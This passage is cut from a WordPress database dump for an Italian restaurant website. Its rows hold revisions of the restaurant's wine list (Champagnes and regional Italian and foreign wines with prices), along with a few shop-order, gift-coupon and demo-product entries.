(100%meunier)rm          € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJéròme Prévost       La Closerie Extra Brut Gueux                                 € 75,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nChartogne-Taillet  Les Barres (biod.)Ex.Brut 100% meunier Merfy            € 75,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVouette &amp; Sorbée     Fidèle Extra Brut (biologico) Buxieres sur Arce           € 63,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUlysse Collin           Les Taillon Extra Brut rm Congy                                   € 78,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCote de Val Vilaine   Bdn Brut Cedric Bouchard                                           € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAlain Couvrer          Brut Propriétaire récoltante à Prouillly                     € 40,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','I blanc de noir','','inherit','closed','closed','','77-revision-v1','','','2017-11-02 21:18:49','2017-11-02 20:18:49','',77,'http://www.ristorantesolymar.it/2017/11/02/77-revision-v1/',0,'revision','',0),(510,2,'2020-09-26 22:16:19','2020-09-26 20:16:19','<p style=\"text-align: center\"><em><strong><u>I Blanc de Blancs</u></strong></em></p>\nAgrapart &amp; fils                            Terroirs Ex. Brut Grand Cru Avize                                    € 80,00\n\nUlysse Collin                               Les Pierrieres Extra Brut rm Congy                                  € 90,00\n\nPascal Doquet                             Brut   Diapason     Mesnil sur Oger                                   € 62,00\n\nBrut grand cru  Mesnil sur Oger                                        € 85,00\n\nBonnet Gilmert                           Cuvee de reserve Brut Grand Cru Oger                            € 45,00\n\nPierre Gimonnet                         Cuvee 1er cru brut Cuis                                                        € 42,00\n\nDavid Léclapart                           L’artiste pas dose 1er cru (biod.) Trépail                         € 105,00\n\nR &amp; L Legras                                Brut Grand Crù Chouilly                                                      € 50,00\n\nSaint Vincent Grand cru Mill Chouilly                             € 120,00\n\nDiebolt Vallois                             Brut Mill   Cramant                           “11                              € 60,00\n\nFleur de Passion Brut Cramant         “07                          € 120,00\n\nVouette &amp; Sorbée      Blanc d’Argile Extra Brut Buxieres sur Arce            € 80,00','Francia Champagne','','inherit','closed','closed','','79-autosave-v1','','','2020-09-26 22:16:19','2020-09-26 20:16:19','',79,'http://www.ristorantesolymar.it/2017/11/02/79-autosave-v1/',0,'revision','',0),(511,2,'2017-11-02 21:21:06','2017-11-02 20:21:06','<strong>     Assemblaggi</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAgrapart &amp; fils       7 crus Brut     Avize                                                 € 58,00\r\n\r\n&nbsp;\r\n\r\nL.Aubry Fils              Aubry 1er cru. Brut rm Jouy-les-Reims                     € 40,00\r\n\r\nCuvée de Humbert P.C. Brut “ Jouy-les-Reims        € 70,00\r\n\r\n&nbsp;\r\n\r\nAndré Beaufort       Brut millesimato Polisy                                       “05       € 70,00\r\n\r\nBrut grand cru reserve Ambonnay                         € 58,00\r\n\r\n&nbsp;\r\n\r\nBereche et fils         Brut reserve Craon de Ludes                                     € 42,00                                                                      Reflet d’Antan Brut Craon de Ludes                       € 90,00\r\n\r\n&nbsp;\r\n\r\nEmmanuel Brochet Le Mont Benoit Extra Brut Ville-aux-Noeuds         € 60,00\r\n\r\n&nbsp;\r\n\r\nRoger Brun              Brut Reserve à Ay                                                                     € 42,00\r\n\r\nCuvèe des Sires Brut Gran Cru, Ay         “10           € 65,00\r\n\r\n&nbsp;\r\n\r\nCorbon                     Brut Prestige rm   Avize                                               € 56,00\r\n\r\nBrut D’autrefois rm Avize                                             €100,00\r\n\r\n&nbsp;\r\n\r\nLaherte Frères         Ultradition Brut Epernay   0,375 ml                      € 22,00\r\n\r\nUltradition Brut Epernay   0,750 ml                     € 45,00\r\n\r\n&nbsp;\r\n\r\n<strong>                         </strong>\r\n\r\nJaquesson &amp;fils      Cuvee Brut Dizy 740                                             € 63,00\r\n\r\n&nbsp;\r\n\r\nBenoït Lahaye         Brut Natur grand Cru  Bouzy                                         € 60,00\r\n\r\nBrut Naturessense rm     Bouzy                                 € 65,00\r\n\r\nViolaine (senza solforosa aggiunta) Bouzy               € 90,00\r\n\r\n&nbsp;\r\n\r\nGeorges Laval       Brut nature 1er cru Cumieres                                   € 68,00\r\n\r\n&nbsp;\r\n\r\nMarie-Noelle Ledru Brut Grand.Cru mill,  Ambonnay                           € 55,00\r\n\r\nBrut Grand Cru Nature mill. Ambonnay    “08 € 80,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet              Brut Tradition Grand Cru rm Ambonnay               € 68,00\r\n\r\n&nbsp;\r\n\r\nPalmer                        Brut Reserve Reims                                                 € 50,00\r\n\r\nFranck Pascal           Reliance Brut nature (biologico,biodinamico)\r\n\r\nBaslieux                                                                   € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPAG. 08','Champagne - Assemblaggi','','inherit','closed','closed','','79-revision-v1','','','2017-11-02 21:21:06','2017-11-02 20:21:06','',79,'http://www.ristorantesolymar.it/2017/11/02/79-revision-v1/',0,'revision','',0),(512,2,'2017-11-02 21:22:40','2017-11-02 20:22:40','<strong> </strong>\r\n\r\n<strong>   Assemblaggi</strong>\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\nPhilipponnat          Royale Reserve non dose Mareuil-sur-Ay                   € 50,00\r\n\r\n&nbsp;\r\n\r\nMoet et Chandon   Dom Perignon Vintage Epernay                     “06         € 150,00\r\n\r\n&nbsp;\r\n\r\nSavart                      L’Accomplie P.Cru brut  Ecueil                                    € 55,00\r\n\r\n&nbsp;\r\n\r\nVilmart &amp; C         Grand reserve Brut 1er cru Rilly-la-Montagne              € 50,00\r\n\r\n&nbsp;\r\n\r\nKrug                       Grande Cuveè                                                             € 160,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>   I Rosè</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLamiable                  Brut rosé grand cru                                                    € 47,00\r\n\r\n&nbsp;\r\n\r\nGeorges Laval        Cumieres 1er cru brut nature rm                           € 90,00\r\n\r\n&nbsp;\r\n\r\nPascal Doquet           Brut 1°ers cru Mesnil sur Oger                               € 50,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>','Assemblaggi e Rosè','','inherit','closed','closed','','81-revision-v1','','','2017-11-02 21:22:40','2017-11-02 20:22:40','',81,'http://www.ristorantesolymar.it/2017/11/02/81-revision-v1/',0,'revision','',0),(513,2,'2017-11-02 21:30:04','2017-11-02 20:30:04','<u> </u>\r\n\r\n<strong><u>   Piemonte………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGaja                         Rossj-Bass Chardonnay                              “16   € 60,00\r\n\r\nEttore Germano     Hèrzu Langhe Bianco doc Riesling          “15  € 24,00\r\n\r\nCeretto                    Blangè Arneis D.O.C.                                    “16 € 23,00\r\n\r\nPomodolce               Diletto Timorasso Colli Tortonesi D.O.C. “15 € 19,00\r\n\r\n&nbsp;\r\n\r\nCoppo                      Monteriolo Chardonnay D.O.C.                  “14 € 34,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Liguria…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nBamboo Road         Stefano legnani bianco non filtrato           “16   € 20,00\r\n\r\n&nbsp;\r\n\r\nPonte di Toi           Stefano legnani bianco non filtrato           “16   € 23,00\r\n\r\n&nbsp;\r\n\r\nBio Vio                          Pigato di Albenga D.O.C.                              “15 € 23,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCà dei Frati            Brolettino D.O.C.                                          “15  € 19,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Piemonte, Liguria, Lombardia','','inherit','closed','closed','','102-revision-v1','','','2017-11-02 21:30:04','2017-11-02 20:30:04','',102,'http://www.ristorantesolymar.it/2017/11/02/102-revision-v1/',0,'revision','',0),(514,2,'2017-11-02 21:31:33','2017-11-02 20:31:33','<strong><u> </u></strong>\r\n\r\n<strong><u>   Trentino Alto Adige…………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\nHartmann Donà              Donà Blanc I.G.T.                               “11 € 27,00\r\n\r\n&nbsp;\r\n\r\nKossler                             Gewurztraminer D.O.C.                              “16 € 20,00\r\n\r\n&nbsp;\r\n\r\nGirlan                               Gewurztraminer D.O.C.                             “16 € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>Michele Appiano Sauvignon St Valentin D.O.C.                   “16 € 32,00</li>\r\n</ol>\r\n&nbsp;\r\n\r\nGewurztraminer St Valentin D.O.C.        “16 € 32,00\r\n\r\n&nbsp;\r\n\r\nFalkenstein                      Riesling D.O.C.                                                “14 € 24,00\r\n\r\n&nbsp;\r\n\r\nPinot Bianco D.O.C.                                        “14 € 22,00\r\n\r\n&nbsp;\r\n\r\nSauvignon D.O.C.                                            “14 € 23,00\r\n\r\n&nbsp;\r\n\r\nNossing                             Kerner Valle Isarco D.O.C.                             “15 € 23,00\r\n\r\n&nbsp;\r\n\r\nPeter Dipoli                      Voglar Sauvignon D.O.C.                             “13 € 26,00\r\n\r\n&nbsp;\r\n\r\nFranz Haas                      Manna Vigneti delle dolomiti I.G.T.             “15 € 26,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Veneto…………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nInama                               Vulcaia Fumè Sauvignon IGT                     “13 € 36,00\r\n\r\n&nbsp;\r\n\r\nGiovanni Menti               Riva Arsiglia                                                     “13 € 17,00\r\n\r\n&nbsp;\r\n\r\nCostadilà Bianco             330 SLM non filtrato Costadilà                      € 19,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>','Trentino, Veneto','','inherit','closed','closed','','104-revision-v1','','','2017-11-02 21:31:33','2017-11-02 20:31:33','',104,'http://www.ristorantesolymar.it/2017/11/02/104-revision-v1/',0,'revision','',0),(515,2,'2017-11-02 21:32:30','2017-11-02 20:32:30','<u> </u>\r\n\r\n<u>I VINI BIANCHI ITALIANI</u>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Emilia Romagna………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAncarani                      Famoso Ravenna I.G.T.                                    “16   € 15,00\r\n\r\nTenuta La Palazza    Tornese Chardonnay I.G.T.                                “16  € 19,00\r\n\r\nPoderi del Nespoli    Pagadebit di Romagna D.O.C.                              “16 € 14,00\r\n\r\nTre Monti                       Ciardo Chardonnay colli di Imola D.O.C.           “16 € 18,00\r\n\r\nSono Chardonnay senza solfiti I.G.P.                    “16 € 15,00\r\n\r\nFattoria Vallona         Ammestesso Pignoletto colli bolognesi D.O.C.   “16 € 21,00\r\n\r\n&nbsp;\r\n\r\nSan Patrignano            Aulente I.G.T.                                                             “16 € 16,00\r\n\r\nCroci                           Campedello D.O.C.(fermentato in bottiglia)   “16 € 15,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Valle d’Aosta…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLes Cretes                 Chardonnay Cuvèe Bois D.O.C.                                “11 € 42,00\r\n\r\n&nbsp;\r\n\r\nPetite Arvine D.O.C.                                                        “16 € 21,00\r\n\r\n&nbsp;\r\n\r\nPavese Ermes           Blanc de Morgex et de la Salle D.O.P.                         “16 € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Emilia Romagna / Val D\'Aosta','','inherit','closed','closed','','83-revision-v1','','','2017-11-02 21:32:30','2017-11-02 20:32:30','',83,'http://www.ristorantesolymar.it/2017/11/02/83-revision-v1/',0,'revision','',0),(516,2,'2017-11-02 21:33:42','2017-11-02 20:33:42','<strong><u>   Friuli Venezia Giulia……………………………………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nSkerk                                Vitovska I.G.T. Venezia Giulia                 “14   € 29,00\r\n\r\n&nbsp;\r\n\r\nParaschos                        “Not” Pinot Grigio I.G.T.                                      €\r\n\r\n&nbsp;\r\n\r\nRonco dei tassi                 Friulano D.O.P. (tocai)                               “16   € 20,00\r\n\r\n&nbsp;\r\n\r\nLe due Terre                        Sacrisassi CoF D.O.C.                                          € 30,00\r\n\r\n&nbsp;\r\n\r\nScubla                                    Bianco Pomedes CoF D.O.C.                          “13   € 27,00\r\n\r\n&nbsp;\r\n\r\nVie di Romans                     Chardonnay Isonzo D.O.C.                               “15   € 26,00\r\n\r\nSauvignon Isonzo D.O.C.                                  “15   € 28,00\r\n\r\n&nbsp;\r\n\r\nLis Neris                        Lis Bianco I.G.T.                                               “14   € 29,00\r\n\r\n&nbsp;\r\n\r\nGris Pinot Grigio D.O.C.                                    “15   € 23,00\r\n\r\n&nbsp;\r\n\r\nDamijan Podversic           Ribolla gialla I.G.T. Venezia Giulia                   € 36,00\r\n\r\n&nbsp;\r\n\r\nMalvasia istriana I.G.T. Venezia Giulia      “11   € 36,00\r\n\r\n&nbsp;\r\n\r\nVenica                               Sauvignon Ronco delle Mele D.O.C.                “16 € 39,00\r\n\r\n&nbsp;\r\n\r\nJermann                           Vintage Tunina bianco Venezia G. I.G.T.     “16 € 42,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>','Friuli Venezia Giulia','','inherit','closed','closed','','85-revision-v1','','','2017-11-02 21:33:42','2017-11-02 20:33:42','',85,'http://www.ristorantesolymar.it/2017/11/02/85-revision-v1/',0,'revision','',0),(517,2,'2017-11-02 21:35:06','2017-11-02 20:35:06','<u> </u>\n\n<strong><u>     Marche………………………………………………………………….</u></strong>\n\n<u> </u>\n\n<u> </u>\n\nMarotti Campi     Albiano Verdicchio dei Cast. di Jesi classico D.O.C. “16    €10,00\n\n&nbsp;\n\nCollestefano           Verdicchio di Matelica D.O.C.                                     “16   € 15,00\n\n&nbsp;\n\nLa Monacesca        Verdicchio di Matelica D.O.C.                                      “15  € 18,00\n\n&nbsp;\n<ol>\n 	<li>San Lorenzo     Le Oche Verdicchio CdJ classico D.O.C.                     “15 € 18,00</li>\n</ol>\nCampo delle Oche verdicchio CdJ class. sup D.O.C.    “13 € 23,00\n\n&nbsp;\n\n&nbsp;\n\n<strong><u>   Toscana…………………………………………………………………….</u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\nTunia                            Chiarofiore Toscana bianco I.G.T.                          “12   € 21,00\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u>   Umbria…………………………………………………………..………….</u></strong>\n\n&nbsp;\n\n&nbsp;\n\nCastello della Sala Cervaro della Sala Umbria I.G.T. Antinori            “14   € 50,00\n\n&nbsp;\n\n<strong><u>   Abruzzo……………………………………….……………………………..</u></strong>\n\n<strong> </strong>\n\n<strong> </strong>\n\nEmidio Pepe                  Trebbiano D’Abruzzo D.O.C.                               “15 € 36,00\n\n&nbsp;\n\nMasciarelli                     Marina Cvetic Treb.d’Abruzzo ris. D.O.C.          “14 € 32,00\n\n&nbsp;\n\nFrancesco cirelli            Trebbiano d’Abruzzo D.O.C. “bio”                 “15 € 16,00\n\n&nbsp;\n\nTrebbiano d’Abruzzo D.O.C. anfora“bio”       “16 € 26,00\n\n&nbsp;\n\nValentini                        Trebbiano d’Abruzzo D.O.C.                               “13 € 80,00\n\n&nbsp;\n\n&nbsp;','Marche, Toscana, Umbria','','inherit','closed','closed','','87-autosave-v1','','','2017-11-02 21:35:06','2017-11-02 20:35:06','',87,'http://www.ristorantesolymar.it/2017/11/02/87-autosave-v1/',0,'revision','',0),(518,2,'2017-11-02 21:35:08','2017-11-02 20:35:08','<u> </u>\r\n\r\n<strong><u>     Marche………………………………………………………………….</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi     Albiano Verdicchio dei Cast. di Jesi classico D.O.C. “16    €10,00\r\n\r\n&nbsp;\r\n\r\nCollestefano           Verdicchio di Matelica D.O.C.                                     “16   € 15,00\r\n\r\n&nbsp;\r\n\r\nLa Monacesca        Verdicchio di Matelica D.O.C.                                      “15  € 18,00\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>San Lorenzo     Le Oche Verdicchio CdJ classico D.O.C.                     “15 € 18,00</li>\r\n</ol>\r\nCampo delle Oche verdicchio CdJ class. sup D.O.C.    “13 € 23,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                            Chiarofiore Toscana bianco I.G.T.                          “12   € 21,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Umbria…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCastello della Sala Cervaro della Sala Umbria I.G.T. Antinori            “14   € 50,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Abruzzo……………………………………….……………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nEmidio Pepe                  Trebbiano D’Abruzzo D.O.C.                               “15 € 36,00\r\n\r\n&nbsp;\r\n\r\nMasciarelli                     Marina Cvetic Treb.d’Abruzzo ris. D.O.C.          “14 € 32,00\r\n\r\n&nbsp;\r\n\r\nFrancesco cirelli            Trebbiano d’Abruzzo D.O.C. “bio”                 “15 € 16,00\r\n\r\n&nbsp;\r\n\r\nTrebbiano d’Abruzzo D.O.C. anfora“bio”       “16 € 26,00\r\n\r\n&nbsp;\r\n\r\nValentini                        Trebbiano d’Abruzzo D.O.C.                               “13 € 80,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Marche, Toscana, Umbria','','inherit','closed','closed','','87-revision-v1','','','2017-11-02 21:35:08','2017-11-02 20:35:08','',87,'http://www.ristorantesolymar.it/2017/11/02/87-revision-v1/',0,'revision','',0),(519,2,'2017-11-02 21:37:47','2017-11-02 20:37:47','<strong><u> </u></strong>\r\n\r\n<strong><u>   Puglia…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGreco Bianco           salento 141   Archetipo                                     “15         € 17,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania……………………………………….……………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBajola                               Bianco (non filtrato non chiarificato)             “13    € 27,00\r\n\r\n&nbsp;\r\n\r\nVilla Matilde                  Falanghina Rocca Monfina I.G.P.                 “16     € 16,00\r\n\r\n&nbsp;\r\n\r\nCantina dell’Angelo       Greco di Tufo D.O.C.G.                                       “15     € 19,00\r\n\r\n&nbsp;\r\n\r\nCiro Picariello               Fiano di Avellino D.O.C.G.                                “16    € 20,00\r\n\r\n&nbsp;\r\n\r\nFerrara Benito              Vigna Cicogna Greco di tufo D.O.C.G.             “15   € 23,00\r\n\r\n&nbsp;\r\n\r\nIl Tufiello                     Don Chisciotte Fiano I.G.T.  (biod.)                “14 € 24,00\r\n\r\n&nbsp;\r\n\r\nMarisa Cuomo             Costa di Amalfi furore D.O.C.                     “16 € 22,00\r\n\r\n&nbsp;\r\n\r\nFiorduva Furore Bianco Amalfi D.O.C.           “16 € 45,00\r\n\r\n&nbsp;\r\n\r\nALE.P.A.                             Riccio Bianco (uve pallagrello) I.G.T.       “12 € 19,00\r\n\r\n&nbsp;\r\n\r\nPrivo (uve pallagrello no solfiti aggiunti)           “13 € 27,00\r\n\r\n&nbsp;\r\n\r\nLuigi Maffini                     Kratos Fiano Cilento D.O.P.                             “16 € 19,00\r\n\r\nPietraincatenata Fiano Cilento D.O.P.             “15 € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Abruzzo, Campania','','inherit','closed','closed','','89-revision-v1','','','2017-11-02 21:37:47','2017-11-02 20:37:47','',89,'http://www.ristorantesolymar.it/2017/11/02/89-revision-v1/',0,'revision','',0),(520,2,'2017-11-02 21:39:10','2017-11-02 20:39:10','<strong><u> </u></strong>\r\n\r\n<strong><u>   Sicilia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nDonnafugata          La Fuga chardonnay Entellina                        “16       € 20,00\r\n\r\n&nbsp;\r\n\r\nChiarandà chardonnay Entellina D.O.P.       “14       € 32,00\r\n\r\n&nbsp;\r\n\r\nGraci                         Etna bianco D.O.C.                                       “16   € 20,00\r\n\r\n&nbsp;\r\n\r\nSalvatore Murana Gadì Bianco di Pantelleria D.O.C.                 “13    € 23,00\r\n\r\n&nbsp;\r\n\r\nPassopisciaro                   Guardiola Sicilia I.G.T.                            “15    € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBarraco                    Vignammare I.G.P.                                                         € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMarco de Bartoli     Sole e Vento I.G.T.                                      “ 16 € 21,00\r\n\r\n&nbsp;\r\n\r\nSP68                         Terre Siciliane Bianco IGT Occhipinti               “16   € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sardegna…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nCapichera               Vigna’ngena Vermentino D.O.C.G.                          “16 € 28,00\r\n\r\n&nbsp;\r\n\r\nCamminera            Adarya Vermentino.                                                 “16   € 19,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>','Sicilia, Sardegna','','inherit','closed','closed','','91-revision-v1','','','2017-11-02 21:39:10','2017-11-02 20:39:10','',91,'http://www.ristorantesolymar.it/2017/11/02/91-revision-v1/',0,'revision','',0),(521,2,'2017-11-02 21:40:06','2017-11-02 20:40:06','<strong><u>   Germania………………………………………………………………......</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDr. Loosen              Blau Schiefer Riesling Troken                           “16       € 23,00\r\n\r\n&nbsp;\r\n\r\nMarkus Molitor      Riesling Haus Klosterberg Troken                    “14         € 22,00\r\n\r\nSchloss Johannisberg   Riesling Gelblack Qualitätswein feinherb     “15     € 29,00\r\n\r\n&nbsp;\r\n\r\nKerper                    Riesling Graacher Domfrobst Grobbes Gewàchs    “14         € 37,00\r\n\r\n&nbsp;\r\n\r\nRiesling Wehlener Sonnenuhr Spàtlese Troken      “15         € 24,00\r\n\r\n&nbsp;\r\n\r\nJoh. Jos. Prum       Riesling kabinett                                                 “14       € 29,00\r\n\r\n&nbsp;\r\n\r\nRiesling wehlener sonnenuhr spatlese               “11     € 47,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Spagna……………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia  Vina Gravonia Blanco Crianza                                           “07     € 27,00\r\n\r\n&nbsp;\r\n\r\nVina Tondonia Blanco reserva                                           € 36,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Nuova Zelanda………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSaint Clair              Sauvignon Blanc                                                                     € 28,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Austria, Germania, Spagna, Nuova Zelanda','','inherit','closed','closed','','96-revision-v1','','','2017-11-02 21:40:06','2017-11-02 20:40:06','',96,'http://www.ristorantesolymar.it/2017/11/02/96-revision-v1/',0,'revision','',0),(4304,1,'2018-08-09 14:36:43','2018-08-09 14:36:43','','kitchen-img-gallery-1','','inherit','open','closed','','kitchen-img-gallery-1','','','2018-08-09 14:36:43','2018-08-09 14:36:43','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-1.jpg',0,'attachment','image/jpeg',0),(523,2,'2017-11-02 21:42:55','2017-11-02 20:42:55','<u>I VINI ROSsI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Emilia Romagna………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSan Patrignano               Aulente Rosso I.G.T.                                             € 16,00\r\n\r\n&nbsp;\r\n\r\nPoderi del Nespoli           Fico Grande Sangiovese D.O.C.                        € 14,00\r\n\r\nPrugneto sang.Sup. D.O.C.                                € 17,00\r\n\r\n&nbsp;\r\n\r\nAriola                               Marcello lambrusco dell’Emilia I.G.T.           € 17,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Piemonte………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCa’ del Baio                       Asili barbaresco D.O.C.G.                           € 32,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Alto Adige…………………………………………………………………………</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nGirlan                               Patricia Pinot Nero D.O.C.                                 € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……..……………………………………………………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUmani Ronchi                 Fonte del Re Lacrima di Morro D.O.C.            € 17,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\nFattoria Torre a Cona     Chianti colli fiorentini D.O.C.G.                       € 15,00\r\n\r\nCantina di Montalcino     Rosso di Montalcino D.O.C.                         € 18,00\r\n\r\nTunia                                     Chiassobuio Toscana igt                               € 21,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nDonnafugata                       Sherazade nero d’Avola D.O.C.                   € 28,00\r\n\r\nPAG.','Vini Rossi','','inherit','closed','closed','','100-revision-v1','','','2017-11-02 21:42:55','2017-11-02 20:42:55','',100,'http://www.ristorantesolymar.it/2017/11/02/100-revision-v1/',0,'revision','',0),(525,1,'2017-11-21 14:00:48','2017-11-21 13:00:48','','Order &ndash; novembre 21, 2017 @ 02:00 PM','','wc-processing','open','closed','order_5a142380009b6','ordine-nov-21-2017-0100-pm','','','2017-11-21 14:02:48','2017-11-21 13:02:48','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=525',0,'shop_order','',2),(526,0,'2017-11-21 14:02:50','2017-11-21 13:02:50','GIFTCARD ORDER #525','solymarcouponR0HEB','GIFTCARD ORDER #525','publish','closed','closed','','solymarcouponr0heb','','','2017-11-21 14:02:50','2017-11-21 13:02:50','',0,'http://www.ristorantesolymar.it/2017/11/21/solymarcouponr0heb/',0,'shop_coupon','',0),(527,1,'2017-11-29 13:33:07','2017-11-29 12:33:07','','Order &ndash; novembre 29, 2017 @ 01:33 PM','','wc-cancelled','open','closed','order_5a1ea9031f385','ordine-nov-29-2017-1233-pm','','','2017-11-29 14:40:37','2017-11-29 13:40:37','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=527',0,'shop_order','',1),(528,1,'2018-08-03 14:35:02','2018-08-03 14:35:02','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','French Almond Cake','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','french-almond-cake','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=528',20,'product','',1),(529,2,'2017-12-02 07:48:29','2017-12-02 06:48:29','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/12/capodanno2018.png\" alt=\"\" width=\"650\" height=\"809\" class=\"alignnone size-full wp-image-531\" />\r\n- 